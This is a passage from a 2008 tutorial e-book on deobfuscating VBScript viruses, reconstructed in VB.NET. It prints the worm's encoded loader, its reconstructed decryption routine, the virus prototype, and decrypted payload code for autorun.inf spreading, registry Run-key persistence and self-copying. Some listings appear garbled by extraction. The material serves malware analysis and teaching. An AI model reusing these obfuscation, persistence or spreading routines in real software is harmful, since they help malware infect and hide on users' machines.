variables, comments, instruction and the other things… we can see a set of variables
which are: x, y, z and w.

The following listing shows the values of those variables:
LISETING 2.5: The variables of the uc function.
x="633d766263726C663A643D3132373A663D31313A6A3D31323A683D31343A6D
3D33313A723D38333A6B3D313A6E3D383A733D3131343A753D2D353A763D350D0
A693D22696620613D223A743D22207468656E20223A653D22656C736569662061
3E3D223A613D2220616E6420613C3D223A673D22613D612B223A6F3D742663266
73A703D6326653A713D6326690D0A65786563757465286C2622666F722069693D
3120746F206C656E2862293A613D617363286D696428622C69692C31292922267
12622642226742622613D31332226712622662226742622613D31302226712622
6A22267426632622613D3334222663266526226822266126226D22266F2622722
- 30 - 2267026226B22266126226E22266F262273222670262235332226612622353722
266F262275222670262234382226612622353222266F2622762226632622656E6
4206966222663262275633D75632B63687228612922266326226E657874222663
262275633D726E2B632B75632229"
y="execute """""
z="&chr(&h"
w=")"
After that declaration we find the follo wing code:
LISETING 2.6: suite of the uc function.
execute("do while len(x)>1:if isnumeric(left(x,1)) _

then y=y&z&left(x,2)&w:x=mid(x,3) _
else y=y&z+left(x,4)+w:x=mid(x,5)"&vbcrlf&"loop"):execute(y)
Now we have the uc function, analyzing listing 2.6 we find that we have two execute
statements, the first having code that make the y variable, and the second execute
the instruction in the string y. So now we know that the first step of the code is to
make the y variable.
We move on and try to make that y variable also, we need just to copy the
declaration of variables and the instructions inside the first execute function to our
project work space. Listing 2.7 shows the complete code of a class in VB.NET that
contains the uc function and the implementation of its functionalities.
The code below shows some of the techniques we‘ll use in all the process of
decrypting the virus, so I‘ll just explain them here.
First, we found two execute statements in our uc function, the first makes the y
string and the second executes it, so it‘s normally to make some simple changes to
the first to get our y string, for knowing why it‘s executed after that.
Trying to make y implies us to use our proper language (VB.NET in our case), so we
first make option strict and option implicit to off to behave closely to VBScript
(avoiding declaration and returning values of functions and most importantly casting).

Second we just copy the declaration of variables and the code inside the execute
statement, and organize it in a way we could have a good look and the same results
Finally we affect y to the returning result of the function, and assign it to the text
property of a TextBox in the Load event of our Form.
LISETING 2.7: a Vb.net classe implementing the uc function.

- 31 - Option Explicit Off
Option Strict Off
Imports vb = Microsoft.VisualBasic
Public Class Form1
Private Sub Form1_Load(ByVal sender As Object, ByVal e As

System.EventArgs) Handles Me.Load
TextBox1.Text = uc("")
End Sub
Function uc(ByVal b)
x =
"633d766263726C663A643D3132373A663D31313A6A3D31323A683D31343A6D3
D33313A723D38333A6B3D313A6E3D383A733D3131343A753D2D353A763D350D0
A693D22696620613D223A743D22207468656E20223A653D22656C73656966206
13E3D223A613D2220616E6420613C3D223A673D22613D612B223A6F3D7426632
6673A703D6326653A713D6326690D0A65786563757465286C2622666F7220696
93D3120746F206C656E2862293A613D617363286D696428622C69692C3129292
226712622642226742622613D31332226712622662226742622613D313022267
126226A22267426632622613D3334222663266526226822266126226D22266F2
6227222267026226B22266126226E22266F26227322267026223533222661262
2353722266F262275222670262234382226612622353222266F2622762226632
622656E64206966222663262275633D75632B63687228612922266326226E657
874222663262275633D726E2B632B75632229"
y = "execute """""
z = "&chr(&h"
w = ")"
'here the first execute statement
Do While Len(x) > 1
If IsNumeric(vb.Left(x, 1)) Then
y = y & z & vb.Left(x, 2) & w
x = Mid(x, 3)
Else
y = y & z + vb.Left(x, 4) + w
x = Mid(x, 5)
End If
Loop
'execute(y)
Return y
End Function
End Class

Running that code gives us the following result:
- 32 -
Pretty cool isn‘t it? We just started to see results, don‘t tell me you don‘t see anything.
Well ok it‘s a non-understood characters for humans but see closely, it‘s just a series
of Chr function that gives us a character when providing it the ASCII code
associated.
Tip: Understanding What’s Going On :
Here, we should mention that what we see is the transformed variable x with
some strategies of encryption, remember that what we have is the y variable, that
means: the encrypted code of the uc function is in the x variable and the
decrypted (the pseudo-decrypted) code is in the y variables, and remember also
that that y variable will be executed by the second execute statement of the uc
function.
Now we should transform our Chr functions to real characters so we can see
more precisely what‘s going on.
The code is simply checking for the first character in the x variable, if it is a number it
extracts two characters from the leftmost and passed them to the chr function and
deleting them from the x variable. If the first character is not a number it extracts four
characters from the leftmost and passed them to the chr function and deleting them
from the x variable.
Because the extracted valued are in Hexadecimal we need to concatenate the with
the &H prefix as follows

LISETING 2.8:
y = y & Chr("&H" & vb.Left(x, 2))
Now we do some changes in our previous uc function in listing 2.7, the changes are
in bold.
- 33 - LISETING 2.9: a Vb.net classe implementing the uc function.
x = "633d766263726C663A643D3132373…"
y = "execute """""
z = "&chr(&h"
w = ")"
'here the first execute statement
Do While Len(x) > 1
If IsNumeric(vb.Left(x, 1)) Then
y = y & Chr("&H" & vb.Left(x, 2))
x = Mid(x, 3)
Else
y = y & Chr("&H" & vb.Left(x, 4))
x = Mid(x, 5)
End If
Loop
'execute(y)
Return y
End Function
After making those changes and running the application we get the following output:
Now, congratulations! We have a fully supported VBScript code and real understood
expressions, but why not make life easier and doing the same as we done before. As
usual we copy the variables declaration, and run out what inside the execute
statement. The following is the new uc function code. It returns what inside the
execute statement, (remember that we want to know what‘s inside the execute
statement not to run it that‘s why we remove the word execute and replace it by
return).

LISETING 2.10: The new uc function code.
c = vbCrLf : d = 127 : f = 11 : j = 12 : h = 14 : m = 31 :r = 83
: k = 1 : n = 8 : s = 114 : u = -5 : v = 5
i = "if a=" : t = " then " : e = "elseif a>=" : a = " and a<=" :
g = "a=a+" : o = t & c & g : p = c & e : q = c & i
Return (l & "for ii=1 to len(b):a=asc(mid(b,ii,1))" & q & "d" &

- 34 - t &_ "a=13" & q & "f" & t & "a=10" & q & "j" & t & c & "a=34" &
c & e & "h" & a & "m" & o & "r" & p & "k" & a & "n" & o & "s" &
p & "53" & a & "57" & o & "u" & p & "48" & a & "52" & o & "v" &
c & "end if" & c & "uc=uc+chr(a)" & c & "next" & c &
"uc=rn+c+uc")
End Function
Running that will gave the following result, which is the native code of the uc function
(as coded by the hacker who designed that virus ).
Think about it, the first code you see of the uc function (the encrypted variable x and
the steps of decoding …) and the one you have just reached, amazing isn‘t it?
The final uc function.

Of course the final code of the uc function mus t include the variables declaration, this
is the ultimate uc source code.
LISETING 2.11: The final uc function code (The VBScript code).
c = vbCrLf : d = 127 : f = 11 : j = 12 : h = 14 : m = 31 :r = 83
: k = 1 : n = 8 : s = 114 : u = -5 : v = 5
g = "a=a+" : o = t & c & g : p = c & e : q = c & i
For ii = 1 To Len(b)
- 35 - a = Asc(Mid(b, ii, 1))
If a = d Then a = 13
If a = f Then a = 10
If a = j Then
a = 34
ElseIf a >= h And a <= m Then
a = a + r
ElseIf a >= k And a <= n Then
a = a + s
ElseIf a >= 53 And a <= 57 Then
a = a + u
a = a + v
End If
uc = uc + Chr(a)
Next
uc = rn + c + uc
End Function

2.1. Decrypting the Virus.VBS.Agent.ah source

code
In the previous chapter we saw how to find the entry point and follow the
execution process until decrypting the uc function (which is actually the one that
will decrypt the rest of the code.), some may ask why that function is the one that
will decrypt the rest of the code, well the answer is so clear, because when we
found the entry point we found that uc function is executed immediately at this
- 36 - step, and we saw also that the arguments passed to it are lo+qo, and hence, the
real source code is hold by those two stings.
To clarify things, let‘s say that we decrypt the function that is responsible for
decrypting the virus, the first step is done in the previous section , we have to
complete the rest (believe me, the uc function will do everything, we have just to
follow the logic of the execution).
Because the two strings lo and qo are passed to the uc function, and because we
have the uc function code, lets pass those variables to the function and see the
result (remember to put the new code of the uc function instead of the old).
The code is so simple; just type in the Load event of the Form the following code,
of course as we said before, you have to copy the variables lo, qo and oo from
the encrypted source code (virus.txt) to the class as follows:
Then add the following TextBox1.Text=uc(lO+qO) in the form load event. Ok let‘s see the
results:
Figure 2.1

Also encrypted code! Ok don‘t give up now! Don‘t you see the famous error
handling of the VB style on error resume next, and by scrolling down to the end you
will see a fully supported VBScript function called er with VBS keywords and
instructions, so we are on the road.
Now we proceed as we have done in the first part of this tutorial, we have to find the
first statement executed in this piece of code. Its so simple I guess just do a search
for the execute function and find out the one that can be executed normally (not
between two ―:‖ marks which means it‘s a standalone function, furthermore it‘s not
within a function … end function blocs or enclosed by quotes).
- 37 - This is the function:
Figure 2.1.a
Now I guess you know what to do next! Just copy what‘s between parentheses of the
execute function that we found, and assign it‘s value to the text property of the
TextBox1, one more step is to copy all the code found here (the code in figure 2.1.a,
just after on error resume next and before the highlighted execute) in the load
event of our form (you find all the code with the project coming with the book),
because actually those are the variables that must be decrypted to find out the
original code just like the x variable from the chapter one.
Here is the code (of course in the load event of the form):
LISETING 2.12: first step in decrypting the virus code.
TextBox1.Text = ext & "dyz))" & ext & "zcx))" & fut & "gt()" & ext &
"gtz" & aft & "ei(name,wt)" & ext & "eiz" & aft & "df(wh)" & ext & "dfz"
& aft & "bf(wh,wt,da)" & ext & "bfz" & aft & "bi(wh)" & ext & "biz" &
aft & "rt(wh,li)" & ext & "rtz" & aft & "wr(rna,rda)" & ext & "wrz" &
aft & "rr(rna,pa)" & ext & "rrz" & aft & "ar(file,cg)" & ext & "arz" &
aft & "dn(loc,web,ris,min)" & ext & "dnz" & aft & "pr(pcs,gs)" & ext &
"prz" & aft & "ec(wt)" & ext & "ecz" & aft & "co(wh)" & ext & "coz" &
aft & "rs(sw)" & ext & "rsz" & aft & "hi(sw)" & ext & "hiz" & aft &
"gi(ids,fid,eid,fname,furl)" & ext & "giz" & aft &
"dw(pcs,fname,furl,kill)" & ext & "dwz" & aft & "us(sw)" & ext & "usz" &
aft & "cu()" & ext & "cuz" & aft & "km(sw)" & ext & "kmz" & aft &
"cf(wh)" & ext & "cfz" & eft

Running it gives us the following code that is actually the prototype of the
virus.
- 38 -
Figure 2.2
Wow, that‘s a real prototype of a program; you can find it in the associated
prototype.txt.
Ok you will say now that we are almost at the end, well you are right lets try out the
first statement in the previous prototype, execute(uc(dyz)), well now you should
know ho to do it your self. Just associate to TextBox1.text the uc(dyz) and run it.
The code In the load event: TextBox1.Text = uc(dyz)
The resulting output:
Now move ahead, analyze the resulting code and try to find out what‘s the next step
of the hacker, if you don‘t find anything try out the next statements from figure 2.2,
and keep trying, well try to find it your self and see if you have some experience from
what you read till now or not.

2.2. a. the problem with the decrypted function

if you moved here because you didn‘t find anything helpful in decoding the previous
prototype, you can just not worry because it‘s not an easy problem to spot.
I‘ll tell you the secret, when I first reached this step, I tried and tried so hard to
understand the following steps of the virus, but I didn‘t found anything, I tried for
hours to find out what‘s the problem and finally, I realized something.
There is a small problem in our uc function, I know! You will say but we did all the
- 39 - decrypting before, and everything works normally, that‘s right but it can‘t continue like
that anymore, there is a missing part of that function.
I you where following me in all the process, I‘ll ask you to turn back to chapter one
and exactly to listing 2.10, here is it again:
LISETING 2.10: The new uc function code.
c = vbCrLf : d = 127 : f = 11 : j = 12 : h = 14 : m = 31 :r = 83
: k = 1 : n = 8 : s = 114 : u = -5 : v = 5
g = "a=a+" : o = t & c & g : p = c & e : q = c & i
Return (l & "for ii=1 to len(b):a=asc(mid(b,ii,1))" & q & "d" &

t & "a=13" & q & "f" & t & "a=10" & q & "j" & t & c & "a=34" & c
& e & "h" & a & "m" & o & "r" & p & "k" & a & "n" & o & "s" & p
& "53" & a & "57" & o & "u" & p & "48" & a & "52" & o & "v" & c
& "end if" & c & "uc=uc+chr(a)" & c & "next" & c & "uc=rn+c+uc")
End Function
Now when we where in the first steps of decoding, we get what we got before, but
now running that code will give a different result, why?
Simply there is a variable in that code called l it‘s just after the keyword return in that
listing, in the previous chapter it had an empty value (l=””), but now and exactly in
the figure 2.1 step, the variables that we got include among them the variable l with
the following value
l = "d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:"
Now if you turn back and execute the listing 2.10 again with declaring the l variable
also you will get the ultimate uc function that will serve us as our powerful weapon.
In order for all that to work we need to declare all the variables we found in the step
figure 2.1 in the class scope so that they will be available to all the function and the
code, here is the declaration:
If it seems not so clear, please refer to the associated project in step 6.

LISETING 2.2: The declaration of the variables.
Public Class Form1

Dim dyz, gtz, eiz, dfz, fut, bfz, biz, rtz, wez, arz, eft, dnz,_
prz, ecs, l, zcx, aft, coz, rn, rsz, hiz, giz As String
Dim rrz, wrz, dwz, usz, cuz, ext, kmz, cfz, cnr, cnp, ecz As String
- 40 - Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As
System.EventArgs) Handles MyBase.Load
TextBox1.text=uc(“something”)
„ The rest of the code commes here
And here is the uc function code after execution:
Now we see a new line of code in the top of our function, this line is the l variable,
and here is the complete uc function code:

LISETING 2.3: The final uc function code (The VBScript code).
c = vbCrLf : d = 127 : f = 11 : j = 12 : h = 14 : m = 31 :r = 83
: k = 1 : n = 8 : s = 114 : u = -5 : v = 5
g = "a=a+" : o = t & c & g : p = c & e : q = c & i
d = 125 : f = 123 : j = 124 : h = 97 : m = 109 : r = 13 :
k = 110 : n = 122 : s = -13 : u = 0 : v = 0
For ii = 1 To Len(b)
a = Asc(Mid(b, ii, 1))
If a = d Then a = 13
If a = f Then a = 10
- 41 - If a = j Then
a = 34
ElseIf a >= h And a <= m Then
a = a + r
ElseIf a >= k And a <= n Then
a = a + s
a = a + u
a = a + v
End If
uc = uc + Chr(a)
Next
uc = rn + c + uc
End Function
Code in bold is the difference from the previous one.
In fact the source code of the virus is composed of that prototype, the variables
declaration step 4 figure 2.1 and the uc function.
LISETING 2.4: The prototype of the virus (found in figure 11).
execute(uc(dyz))
execute(uc(zcx))
function gt():execute(uc(gtz)):end function
function ei(name,wt):execute(uc(eiz)):end function
function df(wh):execute(uc(dfz)):end function
function bf(wh,wt,da):execute(uc(bfz)):end function
function bi(wh):execute(uc(biz)):end function
function rt(wh,li):execute(uc(rtz)):end function
function wr(rna,rda):execute(uc(wrz)):end function
function rr(rna,pa):execute(uc(rrz)):end function
function ar(file,cg):execute(uc(arz)):end function
function dn(loc,web,ris,min):execute(uc(dnz)):end function
function pr(pcs,gs):execute(uc(prz)):end function
function ec(wt):execute(uc(ecz)):end function
function co(wh):execute(uc(coz)):end function
function rs(sw):execute(uc(rsz)):end function
function hi(sw):execute(uc(hiz)):end function
function gi(ids,fid,eid,fname,furl):execute(uc(giz)):end function
function dw(pcs,fname,furl,kill):execute(uc(dwz)):end function
function us(sw):execute(uc(usz)):end function
function cu():execute(uc(cuz)):end function
function km(sw):execute(uc(kmz)):end function
function cf(wh):execute(uc(cfz)):end function

Returning to the step of figure 2.2 (step 5) we start passing all the parameters passed
to the uc function from the prototype found before, we start by uc(dyz), Here is the
code In the load event: TextBox1.Text = uc(dyz) , doing so give us the following:
LISETING 2.5: uc(dyz).
ver = "8" & ".25"

vs = ".vbs"
ve = ".vbe"
- 42 - j = "\"
cm = "%comspec% /c "
dfo = "/8#0/"
til = "Raider " & ver
inf = "\autorun.inf"
ws = CreateObject("wscript.shell")
wmi = GetObject("winmgmts:\\.\root\cimv2")
fso = CreateObject("scripting.filesystemobject")
sis = wmi.execquery("select * from win32_operatingsystem")
dc = fso.drives
ouw = wscript.scriptfullname
win = fso.getspecialfolder(0) & j
Dir = fso.getspecialfolder(1) & j
tmp = fso.getspecialfolder(2) & j
wbe=dir&"wbem\"
mir = Left(ouw, Len(ouw) - Len(wscript.scriptname))
wsr = "createobject(""wscript.shell"").run"
cnr = "\computername"
cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr
cna = rr(cnp, 0)
If cna = "" Then cna = til
rpa="HKLM\software\"&cna&j
rop = "\software\microsoft\windows\currentversion\explorer\"
sf = "shell folders\"
fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs
fap=rr("HKCU"&rop&sf&"favorites",0)&j
dap=rr("HKCU"&rop&sf&"desktop",0)&j
rsn = cna : ht = ec("ivwt?56") : ha = ec(":;9::<5kw9")
hc = ":143gzxHsH" : he = ec("c" + hc)
rsp =
"HKLM\software\microsoft\windows\currentversion\policies\explorer\run\"
If mir = Dir() Then sys = True
For Each si In sis
ca = si.caption
cs = si.codeset
cc = si.countrycode
os = si.oslanguage
wv = si.version
Next
hip="HKCU"&rop&"advanced\showsuperhidden"
hb = "v91:;676x" & Chr(124) & "r;"
If InStr(wv, "5.2") <> 0 Then
hd = "t" + hc
ElseIf os <> 2052 Then
hd = "p" + hc
Else
hd = "$" + hc
End If

We complete with all the occurrences of the uc function in the prototype replacing at
the same time the code we get by the one of execute(uc(“Some Thing Here”)), I‘ll
show just the next occurrence of the uc function, for the others you find them in the
file AllFunctions.txt, the process is the same.
LISETING 2.5: uc(dyz).
For Each d In dc
if mir=d&j then ws.run "explorer "&d,3,false
next
ouc = rt(ouw, -1) : If cf(ouw) Then MsgBox("holle,raider!")
- 43 - km(1)
If sys Then
if rr(rsp&"explorer",0)<>"0" then wr rsp&"explorer",-1
hi(1)
If rr("til", 1) <> til Then
wr("til", til)
wr("tjs", 1)
wr "djs",date
wr("ded", 0)
End If
If rr("atd", 1) = 1 Then ws.run("at /d /y", 0, False)
wr("atd", 0)
if rr(rsp&rsn,0)=ve then rs -1
le = rr("dna", 1)
if ei(tmp&le,1) then ws.run tmp&le
km(0)
cu()
er(1)
wscript.sleep(1000)
if rr("ded",1)<>cstr(date) then ws.run ouw
Else
wscript.sleep(5000)
If pr("wscript.exe", 2) = 2 Then
if rr("tjc",1)=cstr(date) then
wscript.quit()
Else
wr "tjc",date
End If
If pr("wscript.exe", 2) = 1 Then wscript.quit()
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
End If
End If

2.2.b. the final source code

Finally we replace all the appearances of the uc function from the previous prototype
by its equivalent, we just run the uc function with the appropriate parameter and we
get the final source code. By completing all the functions in the prototype we find our
selves with the full code of the virus, you can find it in VirusDecrypted.txt, the full
code is composed of: the functions we have just decrypted now, the uc function and
- 44 -
the last function found in figure 2.1.a and without forgetting the oo variable.

Summary
The weakest part in a VBScript virus is that is must include the function that decrypts
it, that way we just follow the logic of the execution and find the different steps the
virus do before its execution. After that case study, you are surely convinced that
decrypting a VBScript virus is a game and need just some patience and time.
This chapter shows us a complete process of decrypting a VBS virus and the
different problems and tricks that may face us in the whole process, it also gives
- 45 - some tips about how to transform the virus code to produce what we need, for
example we need to know the code but the virus need to execute it. In most cases
you won‘t need more that those basics to decrypt a virus, but who knows maybe
there will be other techniques in the future that we don‘t expect yet.
As you see, decrypting VBScript viruses is a complex task and not a complicated
one, it just need some concentration, programming skills and time. now you can
decode whatever VBS virus or even othe r scripting viruses, you may also notice that
those are simple techniques and need no learning at all, but I think that exploring that
by yourself is a time wasting and maybe so difficult some times, and that‘s why this
book is here.

What‘s next?
The purpose of decrypting a virus is of course not to send it to the Recycle Bin after
that, when having the full source code it‘s the first step of understanding how the
virus work, and some of the cool techniques it implement to diffuse itself, especially in
removable disks and in a network. Unfortunately we won‘t discuss those funny things
in this book! But the good news is I will publish another book soon about that. Of
course you can find it in my web site, so don‘t forget to visit it frequently.
- 46 -
My Website: http://martani.net.googlepages.com
My Forum: http://mtic.1fr1.net
Email: martani.net@live.fr

Pro Decrypting VBScript Viruses

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Pro Decrypting VBScript Viruses

Uploaded by

Copyright:

Available Formats

Pro Decrypting VBScript Viruses MARTANI Fakhrou

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

-2- Pro Decrypting VBScript

Copyright MARTANI eXpress © 2008

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Who Should Read This Book…………………………………………………………….. 7

How To Use This Book…………………………………………………………………… 8

 Chapter 1: Basic Decryption Techniques

 Chapter 2 : A real decryption process

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

About The Author

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

An Overview of This Book

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Who Should Read This Book

Copyright 2008. All Rights Reserved MARTANI ©.

martani.net@live.fr | http://mtic.1fr1.net | http://martani.net.googlepages.com

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

How To Use This Book

Or e-mail me at: martani.net@live.fr

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

kWUbx[+X66Pcr*c J#,@*{~ !*P~P,P~. YEMU`DDE bIP,P,+s/n@#@&P~P,~PM+O;Mx`WC^

/n#pN6E U1YbWx,o Obaw.WaDrCD+nmL+ v#@#@&~P7lMP dY.q,‘~J_CN,Y4rkP4nnPCx,C1Y

;mV, +(PkrY ~~l,wCL PmKhwmYk(snPSkDt~JI@#@&P~\m.PkY.+,‘PE8MWA/ .kPGDt D

From VBScript WMI and ADSI unleashed

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Basic encryption / decryption techniques Chapter I

Well, lets be that network administrator! Fire up notepad, or

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Set Startup = CreateObject("WScript.Shell")

This script is straightforward, there is a function called encode with an s parameter, it

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Ok now its time to try it out, this is the script:

Saving it as a .vbs file and running it gives that following result:

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

1. a. Email-Worm.VBS.Homepage case study

First look to the encrypted source code

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Project: chapter 1 _ virus 1

1ST DECRYPTING TECHNIQUE.

Option Explicit Off

Public Class Form1

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

A PORTION OF CODE FROM 1ST _VIRUS _C OMPLETE _SR C. TXT.

On Error Resume Next

If WS.regread ("HKCU\software\An\mailed") <> "1" then

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

1. b. Virus.VBS.Redlof.l case study

This is a sample screenshot of the encrypted virus:

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Project: chapter 1 _ virus 2 a

Private Sub virus2a_Load(ByVal sender As Object, ByVal e As

That code gives us the following result:

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

Project: chapter 1 _ virus 2 b

You find the complete decrypted source code of the virus in

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

1.c. A Windows Script Encoder sample virus

In line 1 we can see the <script> tag, and inside it we have

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

And here is the decoded virus, 3rd_Virus_Complete_Src.txt:

Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

kWUbx[+X66Pcrc J#,@{~ !*P~P,P~. YEMU`DDE bIP,P,+s/n@#@&P~P,~PM+O;Mx`WC^